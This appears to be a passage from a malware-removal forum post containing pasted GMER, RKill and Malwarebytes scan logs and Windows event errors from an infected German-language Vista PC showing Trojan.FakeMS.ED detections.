Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (12/05/2014 08:55:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung tdsskiller.exe, Version 3.0.0.41, Zeitstempel 0x544faf36, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x00000000,
Prozess-ID 0xe9c, Anwendungsstartzeit tdsskiller.exe0.

Error: (12/05/2014 08:54:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung cdsupdclient.exe, Version 2.0.3.60, Zeitstempel 0x533946fa, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x8bfc7d8b,
Prozess-ID 0xf88, Anwendungsstartzeit cdsupdclient.exe0.


System errors:
=============
Error: (12/06/2014 08:40:36 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: utilitylocalspl_861

Error: (12/06/2014 08:40:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: scrollingwin32Prot1

Error: (12/06/2014 08:40:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: guicca321

Error: (12/06/2014 08:40:34 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: DesktopMBRText1

Error: (12/06/2014 08:40:29 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: gnuutilityUI.exe1

Error: (12/05/2014 09:43:23 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: gnuutilityUI.exe

Error: (12/05/2014 09:43:11 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: FrozenSambaWindows.exe%%3

Error: (12/05/2014 09:43:11 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: FrozenGNUThumbnail.exe%%3

Error: (12/05/2014 09:43:11 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: evrtspkgBckp.exe%%3

Error: (12/05/2014 09:43:11 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: compilerehtraceProt.exe%%3


Microsoft Office Sessions:
=========================

CodeIntegrity Errors:
===================================
  Date: 2014-12-06 09:22:12.373
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 09:22:11.583
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 09:22:10.543
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 09:22:09.333
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 09:19:33.862
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 09:19:32.609
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 09:19:31.658
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 09:19:30.466
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 09:00:38.972
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 09:00:37.989
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Memory info =========================== 

Processor: Pentium(R) Dual-Core CPU T4200 @ 2.00GHz
Percentage of memory in use: 56%
Total physical RAM: 3001.08 MB
Available physical RAM: 1320.47 MB
Total Pagefile: 6232.43 MB
Available Pagefile: 4528.82 MB
Total Virtual: 2047.88 MB
Available Virtual: 1869.68 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:288.08 GB) (Free:238.11 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive j: () (Removable) (Total:1.86 GB) (Free:1.82 GB) FAT

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 93D3AC9B)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=288.1 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 1.9 GB) (Disk ID: 00000000)

Partition: GPT Partition Type.

==================== End Of Log ============================
         
GMER:
Code:
GMER 2.1.19357 - hxxp://www.gmer.net
Rootkit scan 2014-12-06 10:24:00
Windows 6.0.6002 Service Pack 2 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 Hitachi_HTS543232L9A300 rev.FB4OC40C 298,09GB
Running: v5shw8ku.exe; Driver: C:\Users\finja\AppData\Local\Temp\ugloypow.sys


---- User code sections - GMER 2.1 ----

.text           C:\Windows\system32\taskeng.exe[396] kernel32.dll!CreateProcessW                                                                        778C1BF3 5 Bytes  JMP 0302BAB6 
.text           C:\Windows\system32\taskeng.exe[396] kernel32.dll!CreateProcessA                                                                        778C1C28 5 Bytes  JMP 0302BB79 
.text           C:\Windows\system32\taskeng.exe[396] ADVAPI32.dll!CreateProcessAsUserA                                                                  7672CEB9 5 Bytes  JMP 0302BCFE 
.text           C:\Windows\system32\taskeng.exe[396] ADVAPI32.dll!CreateProcessAsUserW                                                                  76741EE9 5 Bytes  JMP 0302BC38 
.text           C:\Windows\system32\taskeng.exe[396] CRYPT32.dll!PFXImportCertStore                                                                     75CEA13D 5 Bytes  JMP 0302A55A 
.text           C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe[1396] kernel32.dll!CreateProcessW                                      778C1BF3 5 Bytes  JMP 0406B285 
.text           C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe[1396] kernel32.dll!CreateProcessA                                      778C1C28 5 Bytes  JMP 0406B32B 
.text           C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe[1396] ADVAPI32.dll!CreateProcessAsUserA                                7672CEB9 5 Bytes  JMP 0406B476 
.text           C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe[1396] ADVAPI32.dll!CreateProcessAsUserW                                76741EE9 5 Bytes  JMP 0406B3CD 
.text           C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe[1396] CRYPT32.dll!PFXImportCertStore                                   75CEA13D 5 Bytes  JMP 04069D69 
.text           C:\Windows\system32\wbem\unsecapp.exe[1856] kernel32.dll!CreateProcessW                                                                 778C1BF3 5 Bytes  JMP 01B6B285 
.text           C:\Windows\system32\wbem\unsecapp.exe[1856] kernel32.dll!CreateProcessA                                                                 778C1C28 5 Bytes  JMP 01B6B32B 
.text           C:\Windows\system32\wbem\unsecapp.exe[1856] ADVAPI32.dll!CreateProcessAsUserA                                                           7672CEB9 5 Bytes  JMP 01B6B476 
.text           C:\Windows\system32\wbem\unsecapp.exe[1856] ADVAPI32.dll!CreateProcessAsUserW                                                           76741EE9 5 Bytes  JMP 01B6B3CD 
.text           C:\Windows\system32\wbem\unsecapp.exe[1856] CRYPT32.dll!PFXImportCertStore                                                              75CEA13D 5 Bytes  JMP 01B69D69 
.text           C:\Program Files\Apoint2K\ApMsgFwd.exe[2576] kernel32.dll!CreateProcessW                                                                778C1BF3 5 Bytes  JMP 0079B285 
.text           C:\Program Files\Apoint2K\ApMsgFwd.exe[2576] kernel32.dll!CreateProcessA                                                                778C1C28 5 Bytes  JMP 0079B32B 
.text           C:\Program Files\Apoint2K\ApMsgFwd.exe[2576] ADVAPI32.dll!CreateProcessAsUserA                                                          7672CEB9 5 Bytes  JMP 0079B476 
.text           C:\Program Files\Apoint2K\ApMsgFwd.exe[2576] ADVAPI32.dll!CreateProcessAsUserW                                                          76741EE9 5 Bytes  JMP 0079B3CD 
.text           C:\Program Files\Apoint2K\ApMsgFwd.exe[2576] CRYPT32.dll!PFXImportCertStore                                                             75CEA13D 5 Bytes  JMP 00799D69 
.text           C:\Windows\system32\igfxsrvc.exe[3036] kernel32.dll!CreateProcessW                                                                      778C1BF3 5 Bytes  JMP 01D0BAB6 
.text           C:\Windows\system32\igfxsrvc.exe[3036] kernel32.dll!CreateProcessA                                                                      778C1C28 5 Bytes  JMP 01D0BB79 
.text           C:\Windows\system32\igfxsrvc.exe[3036] ADVAPI32.dll!CreateProcessAsUserA                                                                7672CEB9 5 Bytes  JMP 01D0BCFE 
.text           C:\Windows\system32\igfxsrvc.exe[3036] ADVAPI32.dll!CreateProcessAsUserW                                                                76741EE9 5 Bytes  JMP 01D0BC38 
.text           C:\Windows\system32\igfxsrvc.exe[3036] CRYPT32.dll!PFXImportCertStore                                                                   75CEA13D 5 Bytes  JMP 01D0A55A 
.text           C:\Windows\System32\mobsync.exe[3072] kernel32.dll!CreateProcessW                                                                       778C1BF3 5 Bytes  JMP 0226BAB6 
.text           C:\Windows\System32\mobsync.exe[3072] kernel32.dll!CreateProcessA                                                                       778C1C28 5 Bytes  JMP 0226BB79 
.text           C:\Windows\System32\mobsync.exe[3072] ADVAPI32.dll!CreateProcessAsUserA                                                                 7672CEB9 5 Bytes  JMP 0226BCFE 
.text           C:\Windows\System32\mobsync.exe[3072] ADVAPI32.dll!CreateProcessAsUserW                                                                 76741EE9 5 Bytes  JMP 0226BC38 
.text           C:\Windows\System32\mobsync.exe[3072] CRYPT32.dll!PFXImportCertStore                                                                    75CEA13D 5 Bytes  JMP 0226A55A 
.text           C:\Program Files\Apoint2K\Apntex.exe[3140] kernel32.dll!CreateProcessW                                                                  778C1BF3 5 Bytes  JMP 0199B285 
.text           C:\Program Files\Apoint2K\Apntex.exe[3140] kernel32.dll!CreateProcessA                                                                  778C1C28 5 Bytes  JMP 0199B32B 
.text           C:\Program Files\Apoint2K\Apntex.exe[3140] ADVAPI32.dll!CreateProcessAsUserA                                                            7672CEB9 5 Bytes  JMP 0199B476 
.text           C:\Program Files\Apoint2K\Apntex.exe[3140] ADVAPI32.dll!CreateProcessAsUserW                                                            76741EE9 5 Bytes  JMP 0199B3CD 
.text           C:\Program Files\Apoint2K\Apntex.exe[3140] CRYPT32.dll!PFXImportCertStore                                                               75CEA13D 5 Bytes  JMP 01999D69 
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] kernel32.dll!CreateThread                                                         7790CBEE 5 Bytes  JMP 6DFB74FB C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!EnableWindow                                                           7633CD8B 5 Bytes  JMP 6DFFA25C C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!DefWindowProcA                                                         7633DB88 7 Bytes  JMP 6DFB9729 C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!CreateWindowExA                                                        7633DC2A 5 Bytes  JMP 6DFC353B C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!CreateWindowExW                                                        76341305 5 Bytes  JMP 6E01FFDF C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!DefWindowProcW                                                         763503B4 7 Bytes  JMP 6E017C92 C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!DialogBoxParamW                                                        763610B0 5 Bytes  JMP 6DF518E3 C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!DialogBoxIndirectParamW                                                76362EF5 5 Bytes  JMP 6E14DBA6 C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!DialogBoxParamA                                                        76378152 5 Bytes  JMP 6E14DB41 C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!DialogBoxIndirectParamA                                                7637847D 5 Bytes  JMP 6E14DC0B C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!MessageBoxIndirectA                                                    7638D4D9 5 Bytes  JMP 6E14DAC8 C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!MessageBoxIndirectW                                                    7638D5D3 5 Bytes  JMP 6E14DA4F C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!MessageBoxExA                                                          7638D639 5 Bytes  JMP 6E14D9EB C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] USER32.dll!MessageBoxExW                                                          7638D65D 5 Bytes  JMP 6E14D987 C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Internet Explorer\iexplore.exe[3276] ole32.dll!OleLoadFromStream                                                       776F1E80 5 Bytes  JMP 6E14E374 C:\Windows\system32\IEFRAME.dll
.text           C:\Program Files\Launch Manager\LManager.exe[3508] kernel32.dll!CreateProcessW                                                          778C1BF3 5 Bytes  JMP 0084BAB6 
.text           C:\Program Files\Launch Manager\LManager.exe[3508] kernel32.dll!CreateProcessA                                                          778C1C28 5 Bytes  JMP 0084BB79 
.text           C:\Program Files\Launch Manager\LManager.exe[3508] ADVAPI32.dll!CreateProcessAsUserA                                                    7672CEB9 5 Bytes  JMP 0084BCFE 
.text           C:\Program Files\Launch Manager\LManager.exe[3508] ADVAPI32.dll!CreateProcessAsUserW                                                    76741EE9 5 Bytes  JMP 0084BC38 
.text           C:\Program Files\Launch Manager\LManager.exe[3508] CRYPT32.dll!PFXImportCertStore                                                       75CEA13D 5 Bytes  JMP 0084A55A 
.text           C:\Program Files\Apoint2K\Apoint.exe[3564] kernel32.dll!CreateProcessW                                                                  778C1BF3 5 Bytes  JMP 0273BAB6 
.text           C:\Program Files\Apoint2K\Apoint.exe[3564] kernel32.dll!CreateProcessA                                                                  778C1C28 5 Bytes  JMP 0273BB79 
.text           C:\Program Files\Apoint2K\Apoint.exe[3564] ADVAPI32.dll!CreateProcessAsUserA                                                            7672CEB9 5 Bytes  JMP 0273BCFE 
.text           C:\Program Files\Apoint2K\Apoint.exe[3564] ADVAPI32.dll!CreateProcessAsUserW                                                            76741EE9 5 Bytes  JMP 0273BC38 
.text           C:\Program Files\Apoint2K\Apoint.exe[3564] CRYPT32.dll!PFXImportCertStore                                                               75CEA13D 5 Bytes  JMP 0273A55A 
.text           C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe[3680] kernel32.dll!CreateProcessW                                          778C1BF3 5 Bytes  JMP 02A0BAB6 
.text           C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe[3680] kernel32.dll!CreateProcessA                                          778C1C28 5 Bytes  JMP 02A0BB79 
.text           C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe[3680] ADVAPI32.dll!CreateProcessAsUserA                                    7672CEB9 5 Bytes  JMP 02A0BCFE 
.text           C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe[3680] ADVAPI32.dll!CreateProcessAsUserW                                    76741EE9 5 Bytes  JMP 02A0BC38 
.text           C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe[3680] CRYPT32.dll!PFXImportCertStore                                       75CEA13D 5 Bytes  JMP 02A0A55A 
.text           C:\Windows\System32\igfxtray.exe[3700] kernel32.dll!CreateProcessW                                                                      778C1BF3 5 Bytes  JMP 0274BAB6 
.text           C:\Windows\System32\igfxtray.exe[3700] kernel32.dll!CreateProcessA                                                                      778C1C28 5 Bytes  JMP 0274BB79 
.text           C:\Windows\System32\igfxtray.exe[3700] ADVAPI32.dll!CreateProcessAsUserA                                                                7672CEB9 5 Bytes  JMP 0274BCFE 
.text           C:\Windows\System32\igfxtray.exe[3700] ADVAPI32.dll!CreateProcessAsUserW                                                                76741EE9 5 Bytes  JMP 0274BC38 
.text           C:\Windows\System32\igfxtray.exe[3700] CRYPT32.dll!PFXImportCertStore                                                                   75CEA13D 5 Bytes  JMP 0274A55A 
.text           C:\Windows\System32\hkcmd.exe[3708] kernel32.dll!CreateProcessW                                                                         778C1BF3 5 Bytes  JMP 02BABAB6 
.text           C:\Windows\System32\hkcmd.exe[3708] kernel32.dll!CreateProcessA                                                                         778C1C28 5 Bytes  JMP 02BABB79 
.text           C:\Windows\System32\hkcmd.exe[3708] ADVAPI32.dll!CreateProcessAsUserA                                                                   7672CEB9 5 Bytes  JMP 02BABCFE 
.text           C:\Windows\System32\hkcmd.exe[3708] ADVAPI32.dll!CreateProcessAsUserW                                                                   76741EE9 5 Bytes  JMP 02BABC38 
.text           C:\Windows\System32\hkcmd.exe[3708] CRYPT32.dll!PFXImportCertStore                                                                      75CEA13D 5 Bytes  JMP 02BAA55A 
.text           C:\Windows\System32\igfxpers.exe[3716] kernel32.dll!CreateProcessW                                                                      778C1BF3 5 Bytes  JMP 02C9BAB6 
.text           C:\Windows\System32\igfxpers.exe[3716] kernel32.dll!CreateProcessA                                                                      778C1C28 5 Bytes  JMP 02C9BB79 
.text           C:\Windows\System32\igfxpers.exe[3716] ADVAPI32.dll!CreateProcessAsUserA                                                                7672CEB9 5 Bytes  JMP 02C9BCFE 
.text           C:\Windows\System32\igfxpers.exe[3716] ADVAPI32.dll!CreateProcessAsUserW                                                                76741EE9 5 Bytes  JMP 02C9BC38 
.text           C:\Windows\System32\igfxpers.exe[3716] CRYPT32.dll!PFXImportCertStore                                                                   75CEA13D 5 Bytes  JMP 02C9A55A 
.text           C:\Program Files\Microsoft Security Client\msseces.exe[3756] kernel32.dll!CreateProcessW                                                778C1BF3 5 Bytes  JMP 0268BAB6 
.text           C:\Program Files\Microsoft Security Client\msseces.exe[3756] kernel32.dll!CreateProcessA                                                778C1C28 5 Bytes  JMP 0268BB79 
.text           C:\Program Files\Microsoft Security Client\msseces.exe[3756] ADVAPI32.dll!CreateProcessAsUserA                                          7672CEB9 5 Bytes  JMP 0268BCFE 
.text           C:\Program Files\Microsoft Security Client\msseces.exe[3756] ADVAPI32.dll!CreateProcessAsUserW                                          76741EE9 5 Bytes  JMP 0268BC38 
.text           C:\Program Files\Microsoft Security Client\msseces.exe[3756] CRYPT32.dll!PFXImportCertStore                                             75CEA13D 5 Bytes  JMP 0268A55A 
.text           C:\Windows\ehome\ehtray.exe[3860] kernel32.dll!CreateProcessW                                                                           778C1BF3 5 Bytes  JMP 02D9BAB6 
.text           C:\Windows\ehome\ehtray.exe[3860] kernel32.dll!CreateProcessA                                                                           778C1C28 5 Bytes  JMP 02D9BB79 
.text           C:\Windows\ehome\ehtray.exe[3860] ADVAPI32.dll!CreateProcessAsUserA                                                                     7672CEB9 5 Bytes  JMP 02D9BCFE 
.text           C:\Windows\ehome\ehtray.exe[3860] ADVAPI32.dll!CreateProcessAsUserW                                                                     76741EE9 5 Bytes  JMP 02D9BC38 
.text           C:\Windows\ehome\ehtray.exe[3860] CRYPT32.dll!PFXImportCertStore                                                                        75CEA13D 5 Bytes  JMP 02D9A55A 

---- Devices - GMER 2.1 ----

AttachedDevice  \FileSystem\fastfat \Fat                                                                                                                fltmgr.sys

---- Threads - GMER 2.1 ----

Thread          explorer.exe [2620:2600]                                                                                                                02286884
Thread          explorer.exe [2620:2388]                                                                                                                02286886
Thread          explorer.exe [2620:1964]                                                                                                                02286886
Thread          explorer.exe [4148:5312]                                                                                                                00449244
Thread          explorer.exe [4148:5044]                                                                                                                00449246

---- Registry - GMER 2.1 ----

Reg             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\933448FAA8F23954183BF9C44530C8E4\Usage@WinMailFeat  1166409757

---- EOF - GMER 2.1 ----
         
RKill:
Code:
ATTFilter
Rkill 2.6.8 by Lawrence Abrams (Grinler)
hxxp://www.bleepingcomputer.com/
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
 hxxp://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 12/06/2014 08:40:21 AM in x86 mode.
Windows Version: Windows Vista (TM) Home Premium Service Pack 2

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * C:\Users\finja\AppData\Local\gnuutilityUI\gnuutilityUI.exe (PID: 2112) [UP-HEUR]
 * C:\Windows\system32\DesktopMBRText\DesktopMBRText.exe (PID: 2004) [WD-HEUR]
 * C:\Windows\system32\guicca32\guicca32.exe (PID: 3516) [WD-HEUR]
 * C:\Windows\system32\scrollingwin32Prot\scrollingwin32Prot.exe (PID: 3968) [WD-HEUR]
 * C:\Windows\system32\utilitylocalspl_86\utilitylocalspl_86.exe (PID: 3152) [WD-HEUR]

5 proccesses terminated!

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * No issues found.

Checking Windows Service Integrity: 

 * Windows-Firewall (MpsSvc) is not Running.
   Startup Type set to: Disabled

 * Sicherheitscenter (wscsvc) is not Running.
   Startup Type set to: Disabled

 * Windows-Firewallautorisierungstreiber (mpsdrv) is not Running.
   Startup Type set to: Manual

Searching for Missing Digital Signatures: 

 * No issues found.

Checking HOSTS File: 

 * HOSTS file entries found: 

  127.0.0.1       localhost
  ::1             localhost
  127.0.0.1			d3oxij66pru1i3.cloudfront.net

Program finished at: 12/06/2014 08:50:20 AM
Execution time: 0 hours(s), 10 minute(s), and 26 seconds(s)
         
MBAM:
Code:
ATTFilter
 Malwarebytes Anti-Malware 
www.malwarebytes.org


Detection, 06.12.2014 08:27:35, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31]
Detection, 06.12.2014 08:27:36, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31]
Detection, 06.12.2014 08:27:36, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31]
Detection, 06.12.2014 08:27:41, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31]
Detection, 06.12.2014 08:27:41, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31]
Detection, 06.12.2014 08:27:41, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31]
Detection, 06.12.2014 08:27:41, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31]
Detection, 06.12.2014 08:27:43, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31]
Update, 06.12.2014 08:28:08, SYSTEM, FINJA-PC, Scheduler, Malware Database, 2014.12.5.11, 2014.12.6.4, 
Protection, 06.12.2014 08:28:08, SYSTEM, FINJA-PC, Protection, Refresh, Starting, 
Protection, 06.12.2014 08:28:08, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Stopping, 
Protection, 06.12.2014 08:28:08, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Stopped, 
Detection, 06.12.2014 08:28:13, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [87b82639bbc171c553cfd21c659ccf31]
Protection, 06.12.2014 08:29:17, SYSTEM, FINJA-PC, Protection, Refresh, Success, 
Protection, 06.12.2014 08:29:17, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Starting, 
Protection, 06.12.2014 08:29:22, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Started, 
Detection, 06.12.2014 08:29:23, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:29:27, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:29:39, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:29:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:30:01, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:30:29, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:30:41, finja, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:30:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:30:56, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
Detection, 06.12.2014 08:31:00, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5]
